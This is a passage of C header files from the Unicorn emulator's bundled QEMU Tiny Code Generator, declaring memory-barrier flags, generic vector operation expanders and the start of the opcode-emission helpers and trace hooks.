 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#ifndef TCG_MO_H
#define TCG_MO_H

typedef enum {
    /* Used to indicate the type of accesses on which ordering
       is to be ensured.  Modeled after SPARC barriers.

       This is of the form TCG_MO_A_B where A is before B in program order.
    */
    TCG_MO_LD_LD = 0x01,
    TCG_MO_ST_LD = 0x02,
    TCG_MO_LD_ST = 0x04,
    TCG_MO_ST_ST = 0x08,
    TCG_MO_ALL   = 0x0F,  /* OR of the above */

    /* Used to indicate the kind of ordering which is to be ensured by the
       instruction.  These types are derived from x86/aarch64 instructions.
       It should be noted that these are different from C11 semantics.  */
    TCG_BAR_LDAQ = 0x10,  /* Following ops will not come forward */
    TCG_BAR_STRL = 0x20,  /* Previous ops will not be delayed */
    TCG_BAR_SC   = 0x30,  /* No ops cross barrier; OR of the above */
} TCGBar;

#endif /* TCG_MO_H */
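
/*
 * Usage sketch (not part of the original header): a frontend requests a
 * barrier by OR-ing an access mask with a barrier kind and passing the
 * result to tcg_gen_mb(), which is declared later in tcg/tcg-op.h. The
 * wrapper function here is hypothetical; a sequentially consistent full
 * fence combines TCG_MO_ALL with TCG_BAR_SC.
 */
#if 0 /* illustrative only */
static void gen_full_fence(TCGContext *tcg_ctx)
{
    tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC);
}
#endif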
/* ==== unicorn-2.1.1/qemu/include/tcg/tcg-op-gvec.h ==== */

/*
 * Generic vector operation expansion
 *
 * Copyright (c) 2018 Linaro
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef TCG_TCG_OP_GVEC_H
#define TCG_TCG_OP_GVEC_H

/*
 * "Generic" vectors.  All operands are given as offsets from ENV,
 * and therefore cannot also be allocated via tcg_global_mem_new_*.
 * OPRSZ is the byte size of the vector upon which the operation is performed.
 * MAXSZ is the byte size of the full vector; bytes beyond OPSZ are cleared.
 *
 * All sizes must be 8 or any multiple of 16.
 * When OPRSZ is 8, the alignment may be 8, otherwise must be 16.
 * Operands may completely, but not partially, overlap.
 */

/* Expand a call to a gvec-style helper, with pointers to two vector
   operands, and a descriptor (see tcg-gvec-desc.h).  */
typedef void gen_helper_gvec_2(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i32);
void tcg_gen_gvec_2_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                        uint32_t oprsz, uint32_t maxsz, int32_t data,
                        gen_helper_gvec_2 *fn);

/* Similarly, passing an extra data value.  */
typedef void gen_helper_gvec_2i(TCGContext *, TCGv_ptr, TCGv_ptr,
                                TCGv_i64, TCGv_i32);
void tcg_gen_gvec_2i_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                         TCGv_i64 c, uint32_t oprsz, uint32_t maxsz,
                         int32_t data, gen_helper_gvec_2i *fn);

/* Similarly, passing an extra pointer (e.g. env or float_status).  */
typedef void gen_helper_gvec_2_ptr(TCGContext *, TCGv_ptr, TCGv_ptr,
                                   TCGv_ptr, TCGv_i32);
void tcg_gen_gvec_2_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                        TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz,
                        int32_t data, gen_helper_gvec_2_ptr *fn);

/* Similarly, with three vector operands.  */
typedef void gen_helper_gvec_3(TCGContext *, TCGv_ptr, TCGv_ptr,
                               TCGv_ptr, TCGv_i32);
void tcg_gen_gvec_3_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs,
                        uint32_t bofs, uint32_t oprsz, uint32_t maxsz,
                        int32_t data, gen_helper_gvec_3 *fn);

/* Similarly, with four vector operands.
*/ typedef void gen_helper_gvec_4(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_4_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4 *fn); /* Similarly, with five vector operands. */ typedef void gen_helper_gvec_5(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_5_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t xofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5 *fn); typedef void gen_helper_gvec_3_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_3_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3_ptr *fn); typedef void gen_helper_gvec_4_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_4_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4_ptr *fn); typedef void gen_helper_gvec_5_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_5_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t eofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5_ptr *fn); /* Expand a gvec operation. Either inline or out-of-line depending on the actual vector size and the operations supported by the host. */ typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_2 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; } GVecGen2; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, int64_t); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, int32_t); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, int64_t); /* Expand out-of-line helper w/descriptor, data in descriptor. */ gen_helper_gvec_2 *fno; /* Expand out-of-line helper w/descriptor, data as argument. */ gen_helper_gvec_2i *fnoi; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen2i; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_2i *fno; /* The optional opcodes, if any, utilized by .fniv. 
*/ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ uint32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load scalar as 1st source operand. */ bool scalar_first; } GVecGen2s; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_3 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen3; typedef struct { /* * Expand inline as a 64-bit or 32-bit integer. Only one of these will be * non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, int64_t); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, int32_t); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, int64_t); /* Expand out-of-line helper w/descriptor, data in descriptor. */ gen_helper_gvec_3 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Load dest as a 3rd source operand. */ bool load_dest; } GVecGen3i; typedef struct { /* Expand inline as a 64-bit or 32-bit integer. Only one of these will be non-NULL. */ void (*fni8)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64); void (*fni4)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_i32); /* Expand inline with a host vector type. */ void (*fniv)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, TCGv_vec); /* Expand out-of-line helper w/descriptor. */ gen_helper_gvec_4 *fno; /* The optional opcodes, if any, utilized by .fniv. */ const TCGOpcode *opt_opc; /* The data argument to the out-of-line helper. */ int32_t data; /* The vector element size, if applicable. */ uint8_t vece; /* Prefer i64 to v64. */ bool prefer_i64; /* Write aofs as a 2nd dest operand. */ bool write_aofs; } GVecGen4; void tcg_gen_gvec_2(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, const GVecGen2 *); void tcg_gen_gvec_2i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen2i *); void tcg_gen_gvec_2s(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 c, const GVecGen2s *); void tcg_gen_gvec_3(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, const GVecGen3 *); void tcg_gen_gvec_3i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen3i *); void tcg_gen_gvec_4(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, const GVecGen4 *); /* Expand a specific vector operation. 
*/ void tcg_gen_gvec_mov(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_not(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_neg(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_abs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_add(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_mul(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_addi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_muli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_adds(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_subs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_muls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); /* Saturated arithmetic. */ void tcg_gen_gvec_ssadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sssub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_usadd(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ussub(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); /* Min/max. 
*/ void tcg_gen_gvec_smin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_umin(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_smax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_umax(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_and(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_or(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_andc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_orc(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_nand(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_nor(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_eqv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_andi(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ori(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ands(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_xors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_ors(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_dup_mem(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t s, uint32_t m); void tcg_gen_gvec_dup_i32(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t s, uint32_t m, TCGv_i32); void tcg_gen_gvec_dup_i64(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t s, uint32_t m, TCGv_i64); void tcg_gen_gvec_dup8i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint8_t x); void tcg_gen_gvec_dup16i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint16_t x); void tcg_gen_gvec_dup32i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint32_t x); void tcg_gen_gvec_dup64i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t s, uint32_t m, uint64_t x); void tcg_gen_gvec_shli(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shri(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sari(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, int64_t shift, 
uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shls(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shrs(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sars(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, TCGv_i32 shift, uint32_t oprsz, uint32_t maxsz); /* * Perform vector shift by vector element, modulo the element size. * E.g. D[i] = A[i] << (B[i] % (8 << vece)). */ void tcg_gen_gvec_shlv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_shrv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_sarv(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); void tcg_gen_gvec_cmp(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz); /* * Perform vector bit select: d = (b & a) | (c & ~a). */ void tcg_gen_gvec_bitsel(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz); /* * 64-bit vector operations. Use these when the register has been allocated * with tcg_global_mem_new_i64, and so we cannot also address it via pointer. * OPRSZ = MAXSZ = 8. */ void tcg_gen_vec_neg8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_neg16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_neg32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a); void tcg_gen_vec_add8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_add16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_add32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_sub32_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void tcg_gen_vec_shl8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shl16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shr8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_shr16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_sar8i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); void tcg_gen_vec_sar16i_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t); #endif ������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-op.h�������������������������������������������������������������0000664�0000000�0000000�00000175571�14675241067�0017735�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy 
* of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef TCG_TCG_OP_H #define TCG_TCG_OP_H #include "tcg.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" static inline void gen_uc_tracecode(TCGContext *tcg_ctx, int32_t size, int32_t type, void *uc, uint64_t pc) { TCGv_i32 tsize = tcg_const_i32(tcg_ctx, size); TCGv_i32 ttype; TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); TCGv_ptr tdata; uc_engine* puc = uc; struct list_item *cur; struct hook* hk; TCGTemp* args[] = { tcgv_ptr_temp(tcg_ctx, tuc), tcgv_i64_temp(tcg_ctx, tpc), tcgv_i32_temp(tcg_ctx, tsize), 0 }; const int hook_type = type & UC_HOOK_IDX_MASK; if (puc->hooks_count[hook_type] == 1) { cur = puc->hook[hook_type].head; while (cur) { hk = cur->data; if (!hk->to_delete) { tdata = tcg_const_ptr(tcg_ctx, hk->user_data); args[3] = tcgv_ptr_temp(tcg_ctx, tdata); puc->add_inline_hook(uc, hk, (void**)args, 4); tcg_temp_free_ptr(tcg_ctx, tdata); } cur = cur->next; } } else { ttype = tcg_const_i32(tcg_ctx, type); gen_helper_uc_tracecode(tcg_ctx, tsize, ttype, tuc, tpc); tcg_temp_free_i32(tcg_ctx, ttype); } tcg_temp_free_i64(tcg_ctx, tpc); tcg_temp_free_ptr(tcg_ctx, tuc); tcg_temp_free_i32(tcg_ctx, tsize); } static inline void gen_uc_traceopcode(TCGContext *tcg_ctx, void* hook, TCGv_i64 arg1, TCGv_i64 arg2, uint32_t size, void *uc, uint64_t pc) { TCGv_ptr thook = tcg_const_ptr(tcg_ctx, hook); TCGv_ptr tuc = tcg_const_ptr(tcg_ctx, uc); TCGv_i64 tpc = tcg_const_i64(tcg_ctx, pc); TCGv_i32 tsz = tcg_const_i32(tcg_ctx, size); // #if TARGET_LONG_BITS == 32 // TCGv_i64 targ1 = temp_tcgv_i64(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg1)); // TCGv_i64 targ2 = temp_tcgv_i64(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg2)); // #else // TCGv_i64 targ1 = arg1; // TCGv_i64 targ2 = arg2; // #endif gen_helper_uc_traceopcode(tcg_ctx, thook, arg1, arg2, tsz, tuc, tpc); tcg_temp_free_i32(tcg_ctx, tsz); tcg_temp_free_i64(tcg_ctx, tpc); tcg_temp_free_ptr(tcg_ctx, tuc); tcg_temp_free_ptr(tcg_ctx, thook); } /* Basic output routines. Not for general consumption. 
*/ void tcg_gen_op1(TCGContext *tcg_ctx, TCGOpcode, TCGArg); void tcg_gen_op2(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg); void tcg_gen_op3(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg); void tcg_gen_op4(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg); void tcg_gen_op5(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg); void tcg_gen_op6(TCGContext *tcg_ctx, TCGOpcode, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg, TCGArg); void vec_gen_2(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg); void vec_gen_3(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg, TCGArg); void vec_gen_4(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, TCGArg, TCGArg, TCGArg); static inline void tcg_gen_op1_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1) { tcg_gen_op1(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1)); } static inline void tcg_gen_op1_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1) { tcg_gen_op1(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1)); } static inline void tcg_gen_op1i(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1) { tcg_gen_op1(tcg_ctx, opc, a1); } static inline void tcg_gen_op2_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2)); } static inline void tcg_gen_op2_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2)); } static inline void tcg_gen_op2i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), a2); } static inline void tcg_gen_op2i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), a2); } static inline void tcg_gen_op2ii(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2) { tcg_gen_op2(tcg_ctx, opc, a1, a2); } static inline void tcg_gen_op3_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3)); } static inline void tcg_gen_op3_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3)); } static inline void tcg_gen_op3i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGArg a3) { 